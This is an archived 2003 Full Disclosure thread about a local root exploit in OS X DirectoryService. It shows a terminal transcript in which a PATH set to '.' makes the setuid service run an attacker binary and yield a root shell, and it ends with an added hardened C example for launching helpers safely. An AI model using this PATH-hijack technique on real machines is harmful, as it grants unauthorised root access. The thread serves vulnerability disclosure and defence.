Full Disclosure mailing list archives

Re: OS X DirectoryService DoS {@stake adv:


From: Neeko Oni <neeko () haackey com>
Date: Thu, 17 Apr 2003 22:15:35 -0700 (PDT)

Hoping to encourage people to figure out what @stake was talking about
in regards to the OS X DirectoryService DoS, I've attached a local
exploit for DirectoryService _once it has been crashed/killed_.

[sera:~] loser% gcc osxds.c -o touch
[sera:~] loser% ./touch
Original path: /bin:/sbin:/usr/bin:/usr/sbin
New path: .
Executing DirectoryService with false PATH...
Forked DirectoryService, pausing before shell exec...
sh: rm: command not found
Cross your fingers.
Path restored: /bin:/sbin:/usr/bin:/usr/sbin
euid is root.
root:~# id
uid=0(root) gid=20(staff) groups=20(staff)
root:~# 


Neeko Oni wrote:

Ok, the PATH problem is self-explanatory (and has been exploited once
the DirectoryService process has crashed) but I've had some difficulty
reproducing the DoS attack claim.  I've got a 10.2.4 machine sitting
right next to me, I believe it's a stock install, but DirectoryService
doesn't bind 625.  DirectoryService doesn't bind any ports and
furthermore nothing binds 625 at all.

Has anyone reproduced the DoS in that advisory?

I also read the advisory and of the two MacOS machines that I am able
to access (only one locally) I can confirm that on the machine that
I don't have local access there was a daemon running on port 625 and
as the advisory states I was able to reproduce the DoS attack. I'm 
not sure exactly which version of MacOS X that machine was running
but the daemon did crash and refuse connection.

On the machine that I know for a fact is 10.2.4 and have local access to,
DirectoryService was setuid root and was running but there was no port
625 open. I haven't port scanned the machine to check other ports yet
so I'm not ruling out the possibility it's running on a different port
just yet.

Has anyone else looked into this matter... ?

-subversive


Attachment: osxds.c
Description: C program text
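
The transcript above shows a shell started on behalf of a root process failing to find `rm` once the caller's PATH is `.`, which means the command name was resolved through an inherited environment. The following is an added example, not the attached osxds.c and not Apple's code: it contrasts that inherited-PATH pattern with a helper launch that uses an absolute path and a constant environment. The function names `run_inherited` and `run_helper` are hypothetical, and the fixed PATH value is the "Original path" from the transcript.

```c
#include <errno.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constant environment for helpers; nothing is inherited from the caller. */
static char *const CLEAN_ENV[] = {
    "PATH=/bin:/sbin:/usr/bin:/usr/sbin",
    NULL
};

/* Weak pattern: system() hands the string to sh, which resolves the
 * command name through whatever PATH the invoking user supplied. */
int run_inherited(const char *cmdline) {
    int st = system(cmdline);
    return (st != -1 && WIFEXITED(st)) ? WEXITSTATUS(st) : -1;
}

/* Hardened pattern: absolute path only, no PATH search in the parent,
 * and a constant environment for the child. Returns the helper's exit
 * status, or -1 on refusal or failure. */
int run_helper(const char *abs_path, char *const argv[]) {
    if (abs_path == NULL || abs_path[0] != '/') {
        errno = EINVAL;          /* refuse anything needing a PATH lookup */
        return -1;
    }
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(abs_path, argv, CLEAN_ENV);
        _exit(127);              /* exec failed */
    }
    int st;
    while (waitpid(pid, &st, 0) < 0)
        if (errno != EINTR) return -1;
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

int main(void) {
    /* Probe: does a shell in the child still find the real rm? */
    char *const probe[] = {"sh", "-c", "command -v rm >/dev/null", NULL};
    setenv("PATH", ".", 1);      /* constructed caller environment */
    int weak = run_inherited("command -v rm >/dev/null");
    int safe = run_helper("/bin/sh", probe);
    return (weak != 0 && safe == 0) ? 0 : 1;
}
```

With the caller's PATH set to `.`, the inherited-environment call cannot resolve `rm`, while the helper launched with the constant environment still does.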

